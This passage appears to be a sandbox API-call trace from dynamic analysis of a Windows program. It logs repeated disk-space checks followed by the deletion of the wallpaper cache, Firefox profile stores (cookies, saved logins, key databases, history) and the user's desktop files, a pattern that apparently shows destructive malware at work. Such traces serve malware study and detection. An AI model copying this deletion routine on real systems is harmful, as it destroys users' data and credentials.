lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.384] CoTaskMemFree (pv=0x508980) [0151.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.385] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.385] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.385] CoTaskMemFree (pv=0x508980) [0151.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.386] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.433] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg", dwFileAttributes=0x80) returned 1 [0151.433] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 1 [0151.441] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.441] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.441] CoTaskMemFree (pv=0x508980) [0151.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.443] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.443] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.443] CoTaskMemFree (pv=0x508980) [0151.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.444] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.444] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.444] CoTaskMemFree (pv=0x508980) [0151.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.445] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.445] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.445] CoTaskMemFree (pv=0x508980) [0151.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.446] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.446] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.447] CoTaskMemFree (pv=0x508980) [0151.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.448] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.448] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.448] CoTaskMemFree (pv=0x508980) [0151.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.449] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.449] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.449] CoTaskMemFree (pv=0x508980) [0151.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.450] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.450] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.451] CoTaskMemFree (pv=0x508980) [0151.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.456] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.467] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", dwFileAttributes=0x80) returned 1 [0151.467] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db")) returned 1 [0151.470] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.495] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", dwFileAttributes=0x80) returned 1 [0151.495] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite")) returned 1 [0151.499] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.537] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", dwFileAttributes=0x80) returned 1 [0151.538] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite")) returned 1 [0151.544] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.559] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", dwFileAttributes=0x80) returned 1 [0151.559] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite")) returned 1 [0151.563] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.612] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", dwFileAttributes=0x80) returned 1 [0151.613] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite")) returned 1 [0151.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.626] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", dwFileAttributes=0x80) returned 1 [0151.626] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db")) returned 1 [0151.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.682] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", dwFileAttributes=0x80) returned 1 [0151.683] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite")) returned 1 [0151.686] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0152.635] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", dwFileAttributes=0x80) returned 1 [0152.636] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite")) returned 1 [0152.649] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0152.659] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", dwFileAttributes=0x80) returned 1 [0152.659] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db")) returned 1 [0152.663] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0152.670] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", dwFileAttributes=0x80) returned 1 [0152.670] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak")) returned 1 [0152.674] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0152.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", dwFileAttributes=0x80) returned 1 [0152.709] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite")) returned 1 [0152.715] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0152.739] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", dwFileAttributes=0x80) returned 1 [0152.740] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite")) returned 1 [0152.743] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.743] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.743] CoTaskMemFree (pv=0x508980) [0152.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.747] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.747] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.748] CoTaskMemFree (pv=0x508980) [0152.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.749] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.749] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.749] CoTaskMemFree (pv=0x508980) [0152.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.749] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.750] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.750] CoTaskMemFree (pv=0x508980) [0152.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.753] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0152.851] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", dwFileAttributes=0x80) returned 1 [0152.851] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite")) returned 1 [0152.858] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.858] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.859] CoTaskMemFree (pv=0x508980) [0152.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.860] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.860] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.860] CoTaskMemFree (pv=0x508980) [0152.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.861] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.861] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.861] CoTaskMemFree (pv=0x508980) [0152.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.862] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.862] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.863] CoTaskMemFree (pv=0x508980) [0152.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.863] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.863] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.864] CoTaskMemFree (pv=0x508980) [0152.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.865] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.865] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.866] CoTaskMemFree (pv=0x508980) [0152.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.866] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.866] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.866] CoTaskMemFree (pv=0x508980) [0152.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.868] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0152.868] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.868] CoTaskMemFree (pv=0x508980) [0152.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.869] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.878] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3RKKK.pptx", dwFileAttributes=0x80) returned 1 [0152.878] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3RKKK.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3rkkk.pptx")) returned 1 [0152.882] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.894] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8OYwZJN3.mp3", dwFileAttributes=0x80) returned 1 [0152.894] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8OYwZJN3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8oywzjn3.mp3")) returned 1 [0152.898] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.908] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bg1K-.flv", dwFileAttributes=0x80) returned 1 [0152.908] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bg1K-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bg1k-.flv")) returned 1 [0152.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.920] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dEW3BCITFUKdNr.ppt", dwFileAttributes=0x80) returned 1 [0152.921] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dEW3BCITFUKdNr.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dew3bcitfukdnr.ppt")) returned 1 [0152.924] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.933] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eiro.wav", dwFileAttributes=0x80) returned 1 [0152.933] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eiro.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eiro.wav")) returned 1 [0152.937] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.946] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Em EJk3GYZXqiP.odp", dwFileAttributes=0x80) returned 1 [0152.946] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Em EJk3GYZXqiP.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\em ejk3gyzxqip.odp")) returned 1 [0152.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.963] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F5_.jpg", dwFileAttributes=0x80) returned 1 [0152.963] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F5_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f5_.jpg")) returned 1 [0152.967] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.980] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fQ_p.png", dwFileAttributes=0x80) returned 1 [0152.981] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 